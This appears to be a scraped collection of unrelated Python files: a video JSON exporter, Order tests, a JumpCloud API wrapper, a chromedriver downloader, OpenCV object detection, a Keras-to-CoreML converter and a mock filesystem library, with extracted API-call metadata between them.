] | [((97, 108), 'time.time', 'time.time', ([], {}), '()\n', (106, 108), False, 'import time\n'), ((226, 256), 're.match', 're.match', (['"""^http"""', 'sys.argv[1]'], {}), "('^http', sys.argv[1])\n", (234, 256), False, 'import re\n'), ((813, 829), 'requests.get', 'requests.get', (['ip'], {}), '(ip)\n', (825, 829), False, 'import requests\n'), ((1276, 1289), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (1286, 1289), False, 'import time\n'), ((1138, 1162), 'tornado.ioloop.IOLoop.instance', 'ioloop.IOLoop.instance', ([], {}), '()\n', (1160, 1162), False, 'from tornado import ioloop\n'), ((956, 980), 'tornado.ioloop.IOLoop.instance', 'ioloop.IOLoop.instance', ([], {}), '()\n', (978, 980), False, 'from tornado import ioloop\n'), ((1583, 1594), 'time.time', 'time.time', ([], {}), '()\n', (1592, 1594), False, 'import time\n')] |
# -*- coding: utf-8 -*-
# website: https://loovien.github.io
# author: luowen<<EMAIL>>
# time: 2018/9/29 21:41
# desc:
from typing import List
from pathlib import Path
import shutil
from json import dump
import logging
from datetime import datetime
logger = logging.getLogger(__name__)
def videos_export_json(data: List[dict] = None, output: str = None):
if output is None:
output = "output"
download_dir = Path(output)
if not download_dir.exists():
download_dir.mkdir(mode=644, parents=True)
abs_file = download_dir.joinpath("videos.json")
if abs_file.exists():
shutil.move(abs_file, download_dir.joinpath(
"videos.json-{}".format(datetime.now().strftime("%Y%m%d%H%M%S"))))
with open(abs_file, mode="w", encoding="utf-8") as fd:
dump(data, fd, indent=" ", ensure_ascii=False)
logger.info("export all video to videos.json")
| [
"logging.getLogger",
"datetime.datetime.now",
"json.dump",
"pathlib.Path"
] | [((260, 287), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (277, 287), False, 'import logging\n'), ((427, 439), 'pathlib.Path', 'Path', (['output'], {}), '(output)\n', (431, 439), False, 'from pathlib import Path\n'), ((802, 849), 'json.dump', 'dump', (['data', 'fd'], {'indent': '""" """', 'ensure_ascii': '(False)'}), "(data, fd, indent=' ', ensure_ascii=False)\n", (806, 849), False, 'from json import dump\n'), ((692, 706), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (704, 706), False, 'from datetime import datetime\n')] |
import pytest
from eshop.order import Order
@pytest.fixture
def jan_order() -> Order:
return Order(client_first_name="Jan", client_last_name="Nowak")
@pytest.fixture
def other_jan_order() -> Order:
return Order(client_first_name="Jan", client_last_name="Nowak")
def test_add_element(jan_order):
jan_order.add_element("Rower", quantity=1, price=3_500)
assert len(jan_order.elements) == 1
assert jan_order.elements[0].product == "Rower"
assert jan_order.elements[0].quantity == 1
assert jan_order.elements[0].price == 3_500
def test_empty_order_equality(jan_order, other_jan_order):
ula_order = Order(client_first_name="Ula", client_last_name="Nowak")
jan_kowalski_order = Order(client_first_name="Jan", client_last_name="Kowalski")
assert jan_order == other_jan_order
assert jan_order != 0
assert jan_order != ula_order
assert jan_order != jan_kowalski_order
def test_order_with_different_number_of_elements_not_equals(jan_order, other_jan_order):
jan_order.add_element("Rower", quantity=1, price=3_500)
assert jan_order != other_jan_order
def test_orders_with_different_elements_not_equals(jan_order, other_jan_order):
jan_order.add_element("Rower", quantity=1, price=3_500)
other_jan_order.add_element("Opona", quantity=2, price=50)
assert jan_order != other_jan_order
| [
"eshop.order.Order"
] | [((100, 156), 'eshop.order.Order', 'Order', ([], {'client_first_name': '"""Jan"""', 'client_last_name': '"""Nowak"""'}), "(client_first_name='Jan', client_last_name='Nowak')\n", (105, 156), False, 'from eshop.order import Order\n'), ((218, 274), 'eshop.order.Order', 'Order', ([], {'client_first_name': '"""Jan"""', 'client_last_name': '"""Nowak"""'}), "(client_first_name='Jan', client_last_name='Nowak')\n", (223, 274), False, 'from eshop.order import Order\n'), ((635, 691), 'eshop.order.Order', 'Order', ([], {'client_first_name': '"""Ula"""', 'client_last_name': '"""Nowak"""'}), "(client_first_name='Ula', client_last_name='Nowak')\n", (640, 691), False, 'from eshop.order import Order\n'), ((717, 776), 'eshop.order.Order', 'Order', ([], {'client_first_name': '"""Jan"""', 'client_last_name': '"""Kowalski"""'}), "(client_first_name='Jan', client_last_name='Kowalski')\n", (722, 776), False, 'from eshop.order import Order\n')] |
"""
Unit test use of Path
"""
from pathlib_plus.pathlib_plus import Path
from os.path import expandvars
import unittest
test_base = Path(expandvars(r'%temp%'))
test_folder = Path(r'Program Files(x86)\Steam\steamapps\common\rFactor 2')
DUMMY_FOLDERS = [
r'Installed\Locations\3pa_bathurst_2014',
r'Installed\Locations\60sHockenheim',
r'Installed\Locations\70sWatkinsGlen',
r'Installed\Locations\adelaide_street_circuit',
r'Installed\Locations\barbagallo_v2.3',
r'Installed\Locations\bathurst_2016_v3',
r'Installed\Locations\phillip island',
r'Installed\Vehicles\ac_427sc_1967',
r'Installed\Vehicles\ac_cobra_1954_endurance',
r'Installed\Vehicles\Brabham_1966',
r'Installed\Vehicles\datsun bluebird',
r'Installed\Vehicles\Ferrari_312_67',
r'Installed\Vehicles\flat12_917k_1971',
r'Installed\Vehicles\howston_diss_1974',
r'Installed\Vehicles\howston_g4_1967_endurance',
r'Installed\Vehicles\howston_g4_1968',
r'Installed\Vehicles\howston_g6_1968',
r'Installed\Vehicles\lola_t70_spyder',
r'Installed\Vehicles\mak-corp_group_c',
r'Installed\Vehicles\t70 mkiiib',
r'Installed\Vehicles\toyotacelicagto_1986'
]
class Test_test_Path(unittest.TestCase):
def setUp(self):
self.rf2dir = test_base.joinpath(test_folder)
self.content_store = self.rf2dir.joinpath('Userdata')\
.joinpath('ContentStorage')
self.installed = self.rf2dir.joinpath('Installed')
self.test_mkdir()
for f in DUMMY_FOLDERS:
self.rf2dir.joinpath(f).mkdir(parents=True, exist_ok=True)
def test_setup(self):
_tip = self.rf2dir.joinpath(DUMMY_FOLDERS[-1])
assert _tip.exists()
pass
def test_tearDown(self):
self.test_mkdir()
def test_mkdir(self):
"""
for p in reversed(self.rf2dir.parents):
print(p)
#if not Path(p).exists():
# Path(p).mkdir() # exist_ok=True)
"""
self.rf2dir.mkdir(parents=True, exist_ok=True)
assert self.rf2dir.exists(), self.rf2dir
def tearDown(self):
"""
for f in DUMMY_FOLDERS:
self.rf2dir.joinpath(f).rmdir()
for f in DUMMY_FOLDERS:
d = self.rf2dir.joinpath(Path(f).parent)
if d.exists():
d.rmdir()
for f in DUMMY_FOLDERS:
d = self.rf2dir.joinpath(Path(f).parent.parent)
if d.exists():
d.rmdir()
"""
self.rf2dir.rmdir_tree()
# Now work down to test_base
for p in test_folder.parents:
# All except the . at the end
if p != Path('.'):
test_base.joinpath(p).rmdir()
"""
def test_mkdir(self):
_cs_locations = self.content_store.joinpath('Locations')
_cs_vehicles = self.content_store.joinpath('Vehicles')
try:
self.content_store.mkdir(parents=False, exist_ok=True)
except FileNotFoundError:
raise FileNotFoundError
except FileExistsError:
raise FileExistsError
except Exception as e:
print(e)
raise e
"""
if __name__ == '__main__':
unittest.main()
| [
"pathlib_plus.pathlib_plus.Path",
"os.path.expandvars",
"unittest.main"
] | [((175, 238), 'pathlib_plus.pathlib_plus.Path', 'Path', (['"""Program Files(x86)\\\\Steam\\\\steamapps\\\\common\\\\rFactor 2"""'], {}), "('Program Files(x86)\\\\Steam\\\\steamapps\\\\common\\\\rFactor 2')\n", (179, 238), False, 'from pathlib_plus.pathlib_plus import Path\n'), ((138, 158), 'os.path.expandvars', 'expandvars', (['"""%temp%"""'], {}), "('%temp%')\n", (148, 158), False, 'from os.path import expandvars\n'), ((3218, 3233), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3231, 3233), False, 'import unittest\n'), ((2670, 2679), 'pathlib_plus.pathlib_plus.Path', 'Path', (['"""."""'], {}), "('.')\n", (2674, 2679), False, 'from pathlib_plus.pathlib_plus import Path\n')] |
# Copyright (c) 2010 Google Inc. All rights reserved.
# Use of this source code is governed by a Apache-style license that can be
# found in the LICENSE file.
from google.appengine.ext import db
import base
class FeaturedGame(db.Model):
reference = db.ReferenceProperty(base.Game)
class PopularGame(db.Model):
reference = db.ReferenceProperty(base.Game)
| [
"google.appengine.ext.db.ReferenceProperty"
] | [((255, 286), 'google.appengine.ext.db.ReferenceProperty', 'db.ReferenceProperty', (['base.Game'], {}), '(base.Game)\n', (275, 286), False, 'from google.appengine.ext import db\n'), ((331, 362), 'google.appengine.ext.db.ReferenceProperty', 'db.ReferenceProperty', (['base.Game'], {}), '(base.Game)\n', (351, 362), False, 'from google.appengine.ext import db\n')] |
import cv2
import numpy as np
thres = 0.45
nms_threshold = 0.2
#Default Camera Capture
cap = cv2.VideoCapture(0)
cap.set(3, 1280)
cap.set(4, 720)
cap.set(10, 150)
##Importing the COCO dataset in a list
classNames= []
classFile = 'coco.names'
with open(classFile,'rt') as f:
classNames = f.read().rstrip('\n').split('\n')
##Configuring both SSD model and weights (assigning)
configPath = 'ssd_mobilenet_v3_large_coco_2020_01_14.pbtxt'
weightsPath = 'frozen_inference_graph.pb'
##dnn-Inbuilt method of OpenCV
net = cv2.dnn_DetectionModel(weightsPath,configPath)
net.setInputSize(320, 320)
net.setInputScale(1.0 / 127.5)
net.setInputMean((127.5, 127.5, 127.5))
net.setInputSwapRB(True)
## using Detect method
while True:
success, img = cap.read()
classIds, confs, bbox = net.detect(img, confThreshold=thres)
bbox = list(bbox)
confs = list(np.array(confs).reshape(1, -1)[0])
confs = list(map(float, confs))
indices = cv2.dnn.NMSBoxes(bbox, confs, thres, nms_threshold)
for i in indices:
i = i[0]
box = bbox[i]
x, y, w, h = box[0], box[1], box[2], box[3]
cv2.rectangle(img, (x, y),(x+w, h+y), color=(0, 255, 0), thickness=2)
cv2.putText(img,classNames[classIds[i][0]-1].upper(), (box[0]+10, box[1]+30),
cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 0), 2)
cv2.imshow("Output", img)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows() | [
"cv2.rectangle",
"cv2.imshow",
"numpy.array",
"cv2.dnn_DetectionModel",
"cv2.destroyAllWindows",
"cv2.VideoCapture",
"cv2.dnn.NMSBoxes",
"cv2.waitKey"
] | [((95, 114), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (111, 114), False, 'import cv2\n'), ((522, 569), 'cv2.dnn_DetectionModel', 'cv2.dnn_DetectionModel', (['weightsPath', 'configPath'], {}), '(weightsPath, configPath)\n', (544, 569), False, 'import cv2\n'), ((1444, 1467), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1465, 1467), False, 'import cv2\n'), ((948, 999), 'cv2.dnn.NMSBoxes', 'cv2.dnn.NMSBoxes', (['bbox', 'confs', 'thres', 'nms_threshold'], {}), '(bbox, confs, thres, nms_threshold)\n', (964, 999), False, 'import cv2\n'), ((1348, 1373), 'cv2.imshow', 'cv2.imshow', (['"""Output"""', 'img'], {}), "('Output', img)\n", (1358, 1373), False, 'import cv2\n'), ((1122, 1196), 'cv2.rectangle', 'cv2.rectangle', (['img', '(x, y)', '(x + w, h + y)'], {'color': '(0, 255, 0)', 'thickness': '(2)'}), '(img, (x, y), (x + w, h + y), color=(0, 255, 0), thickness=2)\n', (1135, 1196), False, 'import cv2\n'), ((1381, 1395), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (1392, 1395), False, 'import cv2\n'), ((862, 877), 'numpy.array', 'np.array', (['confs'], {}), '(confs)\n', (870, 877), True, 'import numpy as np\n')] |
# Author: @Corefinder
# Language: Python
# Copyrights: SoumyajitBasu
# Purpose: The purpose of the class ChromeDriver is to check for the respective environment and download the required
# chrome driver for the respective environment.
# Download the latest chromedriver object
import os
import requests
from flexibox.core.logger import Logger
from flexibox.core.utility import Utility
from flexibox.utility.os_type import OS_type
class Chromedriver(object):
def __init__(self):
self.ut = Utility()
self.ot = OS_type()
self.log = Logger()
# Get the required chromedriver informations from the downloader_config.ini
# Use the config_reader function from the Utility class to read the required configuration
def chromedriver_objects(self):
config_dict = {}
config_parser = self.ut.config_reader()
driver_type = config_parser.get('ChromeDriver', 'name')
api_url = config_parser.get('ChromeDriver', 'url')
latest_release = config_parser.get('ChromeDriver', 'latest_browser_driver')
arch = config_parser.get('ChromeDriver', 'arch_type')
config_dict = {'driver_type': driver_type, 'api_url': api_url, 'latest_release': latest_release, 'arch': arch}
return config_dict
# build the required download url based on the information gathered using the
# chromedriver_objects function
def url_builder(self, os_extension):
data = self.chromedriver_objects()
LATEST_RELEASE = requests.get(data['latest_release'])
url_builder = data['api_url'] + LATEST_RELEASE.text + '/' + data['driver_type'] + os_extension + data['arch'
] + '.zip'
return url_builder
# Download the required chromedriver binary based on the operating system type
def evaluate_on_environment(self, os_name, arch_type):
dir_path = self.ut.get_driver_path("/dependencies/dir_chromedriver")
if os_name == 'macos' and arch_type == '64':
self.ut.log_message("INFO", "Environment: " + os_name)
self.ut.log_message("INFO", "Architecture Type: " + arch_type)
url_builder_mac = self.url_builder('_mac')
self.ut.log_message("INFO", "Downloading the required binary for chromedriver")
self.ut.driver_downloader(url_builder_mac, dir_path)
self.ut.log_message("INFO", "Download completed")
self.ut.unzip_file('dir_chromedriver/')
self.ut.log_message("INFO", "Unarchiving contents completed")
if os_name == 'linux' and arch_type == '64':
self.ut.log_message("INFO", "Environment: " + os_name)
self.ut.log_message("INFO", "Architecture Type: " + arch_type)
url_builder_linux = self.url_builder('_linux')
self.ut.log_message("INFO", "Downloading the required binary for chromedriver")
self.ut.driver_downloader(url_builder_linux, dir_path)
self.ut.log_message("INFO", "Download completed")
self.ut.unzip_file('dir_chromedriver/')
self.ut.log_message("INFO", "Unarchiving contents completed")
# Create a required directory separately for Chrome and called the evaluate_on_environment
# function to download the required binary
def download_driver(self):
dir_path = self.ut.get_driver_path("/dependencies/dir_chromedriver")
if os.path.exists(dir_path):
self.ut.log_message(
"INFO",
"chrome driver is already present. To update chromedriver please run `flexibox update --driver=chromedriver`"
)
else:
os.makedirs(dir_path)
os_name = self.ot.os_name()
arch_type = str(self.ot.os_architecture())
self.evaluate_on_environment(os_name, arch_type)
# Update the required chromedriver based on the operating system type
def update_driver(self):
self.ut.check_directory_content("/dependencies/dir_chromedriver/chromedriver")
self.ut.log_message("INFO", "Deleting directory contents")
self.ut.delete_dir_contents('dir_chromedriver/')
os_name = self.ot.os_name()
arch_type = str(self.ot.os_architecture())
self.evaluate_on_environment(os_name, arch_type)
self.ut.log_message("INFO", "chromedriver updated")
| [
"os.path.exists",
"flexibox.core.utility.Utility",
"flexibox.utility.os_type.OS_type",
"os.makedirs",
"requests.get",
"flexibox.core.logger.Logger"
] | [((513, 522), 'flexibox.core.utility.Utility', 'Utility', ([], {}), '()\n', (520, 522), False, 'from flexibox.core.utility import Utility\n'), ((541, 550), 'flexibox.utility.os_type.OS_type', 'OS_type', ([], {}), '()\n', (548, 550), False, 'from flexibox.utility.os_type import OS_type\n'), ((570, 578), 'flexibox.core.logger.Logger', 'Logger', ([], {}), '()\n', (576, 578), False, 'from flexibox.core.logger import Logger\n'), ((1509, 1545), 'requests.get', 'requests.get', (["data['latest_release']"], {}), "(data['latest_release'])\n", (1521, 1545), False, 'import requests\n'), ((3489, 3513), 'os.path.exists', 'os.path.exists', (['dir_path'], {}), '(dir_path)\n', (3503, 3513), False, 'import os\n'), ((3738, 3759), 'os.makedirs', 'os.makedirs', (['dir_path'], {}), '(dir_path)\n', (3749, 3759), False, 'import os\n')] |
import tempfile
from os import name as os_name, getpid
from pathlib import Path
import json
__dir_name = '.manga-py'
def get_temp_path(*args) -> str:
"""
Returns the path of the temporary files manga-py
:param args:
:return:
"""
temp = 'temp_%s' % getpid()
return path_join(tempfile.gettempdir(), __dir_name, temp, *args)
def root_path() -> str:
"""
Returns the root of the installation path manga-py
:return:
"""
_root = Path(__file__).resolve()
return str(_root.parent.parent)
def get_util_home_path() -> str:
"""
Returns the root path of the system files manga-py
:return:
"""
if os_name == 'nt':
home = path_join(str(Path.home()), 'AppData', 'Roaming', __dir_name)
else:
home = path_join(str(Path.home()), __dir_name)
make_dirs(home)
return str(home)
def make_dirs(_path: str):
Path(_path).mkdir(parents=True, exist_ok=True)
def remove_query(name: str) -> str:
position = name.find('?')
if position == 0:
name = 'image.png'
else:
name = name[:position]
return name
def is_file(_path: str) -> bool:
return Path(_path).is_file()
def is_dir(_path: str) -> bool:
return Path(_path).is_dir()
def basename(_path: str) -> str:
return str(Path(_path).name)
def dirname(_path: str) -> str:
return str(Path(_path).parent)
def path_join(_path, *args) -> str:
return str(Path(_path).joinpath(*args))
def unlink(_path: str):
if is_dir(_path):
Path(_path).rmdir()
if is_file(_path):
Path(_path).unlink()
def os_stat(_path: str):
if is_file(_path):
return Path(_path).stat()
return None
def file_size(_path: str):
data = os_stat(_path)
if data is not None:
return data.st_size
return -1
def rename(_from: str, _to: str):
Path(_from).rename(_to)
def storage(_path: str):
"""
Returns the root of the installation path manga-py
:return:
"""
_path = path_join(get_util_home_path(), 'storage', _path)
make_dirs(dirname(_path))
return _path
def walk(_path: str) -> tuple:
"""
:param _path:
:return: tuple(_path, tuple('dirs',), tuple('files',))
"""
dirs = []
files = []
path = Path(_path)
for i in path.iterdir():
if i.is_file():
files.append(i)
if i.is_dir():
dirs.append(i)
return path.resolve(), dirs, files
def listing(_path: str) -> dict:
"""
:param _path:
:return: {'directories': (,), 'files': (,)}
"""
_dirname, _dirnames, _filenames = walk(_path)
return {'directories': _dirnames, 'files': _filenames}
def __get_info(_path: str, result: dict):
file = path_join(_path, 'info.json')
if is_file(file):
with open(file, 'r') as r:
result[_path] = json.loads(r.read())
def get_info(_path: str) -> dict:
"""
listing subdirectories and reading info.json files
:param _path:
:return:
"""
result = {}
for d in listing(_path)['directories']:
directory = path_join(_path, d)
__get_info(directory, result)
return result
| [
"pathlib.Path.home",
"tempfile.gettempdir",
"os.getpid",
"pathlib.Path"
] | [((2269, 2280), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (2273, 2280), False, 'from pathlib import Path\n'), ((275, 283), 'os.getpid', 'getpid', ([], {}), '()\n', (281, 283), False, 'from os import name as os_name, getpid\n'), ((305, 326), 'tempfile.gettempdir', 'tempfile.gettempdir', ([], {}), '()\n', (324, 326), False, 'import tempfile\n'), ((475, 489), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (479, 489), False, 'from pathlib import Path\n'), ((895, 906), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (899, 906), False, 'from pathlib import Path\n'), ((1162, 1173), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (1166, 1173), False, 'from pathlib import Path\n'), ((1229, 1240), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (1233, 1240), False, 'from pathlib import Path\n'), ((1300, 1311), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (1304, 1311), False, 'from pathlib import Path\n'), ((1367, 1378), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (1371, 1378), False, 'from pathlib import Path\n'), ((1859, 1870), 'pathlib.Path', 'Path', (['_from'], {}), '(_from)\n', (1863, 1870), False, 'from pathlib import Path\n'), ((708, 719), 'pathlib.Path.home', 'Path.home', ([], {}), '()\n', (717, 719), False, 'from pathlib import Path\n'), ((795, 806), 'pathlib.Path.home', 'Path.home', ([], {}), '()\n', (804, 806), False, 'from pathlib import Path\n'), ((1440, 1451), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (1444, 1451), False, 'from pathlib import Path\n'), ((1525, 1536), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (1529, 1536), False, 'from pathlib import Path\n'), ((1576, 1587), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (1580, 1587), False, 'from pathlib import Path\n'), ((1662, 1673), 'pathlib.Path', 'Path', (['_path'], {}), '(_path)\n', (1666, 1673), False, 'from pathlib import Path\n')] |
# -*- coding: utf-8 -*-
"""
.. currentmodule:: jccli.jc_api_v1.py
.. moduleauthor:: zaro0508 <<EMAIL>>
This is a utility library for the jumpcloud version 1 api
.. note::
To learn more about the jumpcloud api 1
`project website <https://github.com/TheJumpCloud/jcapi-python/tree/master/jcapiv1>`_.
"""
from distutils.util import strtobool
import jcapiv1
from jcapiv1 import Systemuserput
from jcapiv1.rest import ApiException
from jccli.errors import SystemUserNotFoundError
from jccli.helpers import class_to_dict
# pylint: disable=too-many-arguments
class JumpcloudApiV1:
"""
Wrapper for Jumpcloud API v1
"""
def __init__(self, api_key):
configuration = jcapiv1.Configuration()
configuration.api_key['x-api-key'] = api_key
self.system_users_api = jcapiv1.SystemusersApi(jcapiv1.ApiClient(configuration))
self.search_api = jcapiv1.SearchApi(jcapiv1.ApiClient(configuration))
def retrieve_users(self, user_ids=[]):
"""
Retrieve a list of users corresponding to ids
"""
# FIXME: This is not an ideal way to do this, but search_systemusers_post doesn't seem to allow filtering on ID
all_users = self.get_users()
return [user for user in all_users if user['id'] in user_ids]
def search_users(self, filter={}):
"""
Search for users on jumpcloud.
:param filter: (dict) an object used to filter search results for various fields. E.g.: `{"firstname": "David"}`
:return:
"""
query_filter = {'and': []}
for field, value in filter.items():
query_filter['and'].append({field: value})
if not filter:
query_filter = None
try:
api_response = self.search_api.search_systemusers_post(
content_type='application/json',
accept='application/json',
body={
'filter': query_filter
}
)
users = [user.to_dict() for user in api_response.results]
return users
except ApiException as error:
raise "Exception when calling SystemusersApi->systemusers_list: %s\n" % error
def get_users(self, limit='100', skip=0, search='', filter='', sort='', fields=''):
"""
Get users from jumpcloud
:param limit:
:param skip:
:param search:
:param filter:
:param sort:
:param fields:
:return: a list of users with dict of settings
"""
try:
api_response = self.system_users_api.systemusers_list(content_type='application/json',
accept='application/json',
limit=limit,
skip=skip,
sort=sort,
fields=fields,
x_org_id='',
search=search,
filter=filter)
users = [user.to_dict() for user in class_to_dict(api_response.results)]
return users
except ApiException as error:
raise "Exception when calling SystemusersApi->systemusers_list: %s\n" % error
def create_user(self, systemuser):
"""
Create a new user in jumpcloud
:param systemuser: a dictoionary of Systemuser properties
https://github.com/TheJumpCloud/jcapi-java/blob/master/jcapiv1/docs/Systemuser.md
:return: The api response
"""
body = jcapiv1.Systemuserputpost(username=systemuser['username'],
email=systemuser['email'],
firstname=systemuser.get('firstname', ''),
lastname=systemuser.get('lastname', ''),
allow_public_key=strtobool(
systemuser.get('allow_public_key', 'True')),
ldap_binding_user=strtobool(
systemuser.get('ldap_binding_user', 'False')),
passwordless_sudo=strtobool(
systemuser.get('passwordless_sudo', 'False')),
sudo=strtobool(systemuser.get('sudo', 'False')))
try:
api_response = self.system_users_api.systemusers_post(content_type='application/json',
accept='application/json',
body=body,
x_org_id='')
return api_response.to_dict()
except ApiException as error:
# FIXME: What should this behavior actually be?
raise Exception("Exception when calling SystemusersApi->systemusers_post: %s\n" % error)
def delete_user(self, username):
"""
Delete a user from jumpcloud
:param id: The jumpcloud id of the user
:return:
"""
user_id = self.get_user_id(username)
if user_id is None:
raise SystemUserNotFoundError(f"System user {username} not found")
try:
api_response = self.system_users_api.systemusers_delete(user_id,
content_type='application/json',
accept='application/json',
x_org_id='')
return api_response
except ApiException as error:
raise "Exception when calling SystemusersApi->systemusers_post: %s\n" % error
def get_user_id(self, username):
"""
Get the jumpcloud user id from the user name
:param username
:return: the user id
"""
users = self.get_users(limit='', fields="username")
for user in users:
if user['username'] == username:
return user['id']
raise SystemUserNotFoundError('No user found for username: %s' % (username,))
def get_user(self, username):
"""
Get detail view of a user object.
:param user_id:
:return: user properties dict
"""
# FIXME: As soon as we figure out how the `filter` parameter works on systemusers_list(), we should start
# filtering based on username
users = self.system_users_api.systemusers_list(
accept='application/json',
content_type='application/json'
).results
for user in users:
if user.username == username:
return user.to_dict()
raise SystemUserNotFoundError('No user found for username: %s' % (username,))
def set_user(self, username, attributes):
user_id = self.get_user_id(username)
api_response = self.system_users_api.systemusers_put(
accept='application/json',
content_type='application/json',
id=user_id,
body=Systemuserput(**attributes)
)
return api_response.to_dict()
| [
"jccli.helpers.class_to_dict",
"jcapiv1.Systemuserput",
"jcapiv1.ApiClient",
"jcapiv1.Configuration",
"jccli.errors.SystemUserNotFoundError"
] | [((699, 722), 'jcapiv1.Configuration', 'jcapiv1.Configuration', ([], {}), '()\n', (720, 722), False, 'import jcapiv1\n'), ((6528, 6599), 'jccli.errors.SystemUserNotFoundError', 'SystemUserNotFoundError', (["('No user found for username: %s' % (username,))"], {}), "('No user found for username: %s' % (username,))\n", (6551, 6599), False, 'from jccli.errors import SystemUserNotFoundError\n'), ((7196, 7267), 'jccli.errors.SystemUserNotFoundError', 'SystemUserNotFoundError', (["('No user found for username: %s' % (username,))"], {}), "('No user found for username: %s' % (username,))\n", (7219, 7267), False, 'from jccli.errors import SystemUserNotFoundError\n'), ((831, 863), 'jcapiv1.ApiClient', 'jcapiv1.ApiClient', (['configuration'], {}), '(configuration)\n', (848, 863), False, 'import jcapiv1\n'), ((909, 941), 'jcapiv1.ApiClient', 'jcapiv1.ApiClient', (['configuration'], {}), '(configuration)\n', (926, 941), False, 'import jcapiv1\n'), ((5588, 5648), 'jccli.errors.SystemUserNotFoundError', 'SystemUserNotFoundError', (['f"""System user {username} not found"""'], {}), "(f'System user {username} not found')\n", (5611, 5648), False, 'from jccli.errors import SystemUserNotFoundError\n'), ((7547, 7574), 'jcapiv1.Systemuserput', 'Systemuserput', ([], {}), '(**attributes)\n', (7560, 7574), False, 'from jcapiv1 import Systemuserput\n'), ((3360, 3395), 'jccli.helpers.class_to_dict', 'class_to_dict', (['api_response.results'], {}), '(api_response.results)\n', (3373, 3395), False, 'from jccli.helpers import class_to_dict\n')] |
# See documentation for more details
# https://apple.github.io/coremltools/generated/coremltools.converters.keras.convert.html
import coremltools
from keras.models import model_from_json
from keras.models import load_model
# load model and weights
#json_file = open('keras_model.json', 'r')
#loaded_model_json = json_file.read()
#json_file.close()
#model = model_from_json(loaded_model_json)
#model.load_weights("keras_mnist_model.h5")
model = load_model('keras_mnist_model.h5')
# convert to .mlmodel
keras_model = coremltools.converters.keras.convert(model,
input_names='image (28x28)',
image_input_names='image (28x28)',
output_names = ['prediction'],
class_labels=['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'])
keras_model.author = '<NAME>'
keras_model.license = 'nope'
keras_model.short_description = 'Predicts a handwritten digit'
keras_model.save('my_mnist.mlmodel')
| [
"keras.models.load_model",
"coremltools.converters.keras.convert"
] | [((446, 480), 'keras.models.load_model', 'load_model', (['"""keras_mnist_model.h5"""'], {}), "('keras_mnist_model.h5')\n", (456, 480), False, 'from keras.models import load_model\n'), ((518, 727), 'coremltools.converters.keras.convert', 'coremltools.converters.keras.convert', (['model'], {'input_names': '"""image (28x28)"""', 'image_input_names': '"""image (28x28)"""', 'output_names': "['prediction']", 'class_labels': "['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']"}), "(model, input_names='image (28x28)',\n image_input_names='image (28x28)', output_names=['prediction'],\n class_labels=['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'])\n", (554, 727), False, 'import coremltools\n')] |
"""mockfs: A simple mock filesystem for unit tests."""
import copy
import errno
import fnmatch
import glob
import os
import shutil
import sys
from . import compat
from . import util
# Python functions to replace
builtins = {
'glob.glob': glob.glob,
'os.chdir': os.chdir,
'os.getcwd': os.getcwd,
'os.path.abspath': os.path.abspath,
'os.path.exists': os.path.exists,
'os.path.getsize': os.path.getsize,
'os.path.islink': os.path.islink,
'os.path.isdir': os.path.isdir,
'os.path.isfile': os.path.isfile,
'os.walk': os.walk,
'os.listdir': os.listdir,
'os.makedirs': os.makedirs,
'os.remove': os.remove,
'os.rmdir': os.rmdir,
'os.unlink': os.unlink,
'shutil.rmtree': shutil.rmtree,
}
# On python2.x also replace os.getcwdu
if compat.PY2:
builtins['os.getcwdu'] = os.getcwdu
# We use the original abspath()
_abspath_builtin = builtins['os.path.abspath']
def _OSError(err, path):
"""Return an OSError with an appropriate error string"""
return OSError(err, os.strerror(err) + ": '%s'" % path)
def _IOError(err, path):
"""Return an IOError with an appropriate error string"""
return IOError(err, os.strerror(err) + ": '%s'" % path)
class StorageBackend(object):
def __init__(self, mfs):
self.mfs = mfs
def CheckForFile(self, filename):
return self.mfs.exists(filename)
def DeleteFile(self, filename):
self.mfs.remove(filename)
def LoadFile(self, filename):
return self.mfs.read(filename)
def SaveFile(self, filename, data):
full_path = self.mfs.abspath(filename)
parent_dir = os.path.dirname(full_path)
if self.mfs.exists(parent_dir):
self.mfs.add_entries({filename: data})
else:
raise _IOError(errno.ENOENT, filename)
class MockFS(object):
"""
MockFS implementation object
Provides stubs for functions in :mod:`os`, :mod:`os.path`, and :mod:`glob`.
"""
def __init__(self):
self.cwd = Cwd(self)
self.backend = StorageBackend(self)
self._entries = {}
def add_entries(self, entries):
"""Add new entries to mockfs."""
new_entries = util.build_nested_dict(entries)
util.merge_dicts(new_entries, self._entries)
def exists(self, path):
"""
Return True if path exists
Implements the :func:`os.path.exists` interface.
"""
path = self.abspath(path)
dirent = self._direntry(os.path.dirname(path))
if path == '/':
return bool(dirent)
return bool(dirent) and os.path.basename(path) in dirent
def getsize(self, path):
"""Return the size of a file, reported by os.stat()."""
entry = self._direntry(path)
if entry is None:
raise _OSError(errno.ENOENT, path)
return len(entry)
def read(self, path):
path = self.abspath(path)
dirname = os.path.dirname(path)
basename = os.path.basename(path)
entry = self._direntry(dirname)
if not util.is_dir(entry):
raise _OSError(errno.EPERM, path)
try:
return entry[basename]
except KeyError:
raise _OSError(errno.ENOENT, path)
def isdir(self, path):
"""
Return True if path is a directory
Implements the :func:`os.path.isdir` interface.
"""
return util.is_dir(self._direntry(path))
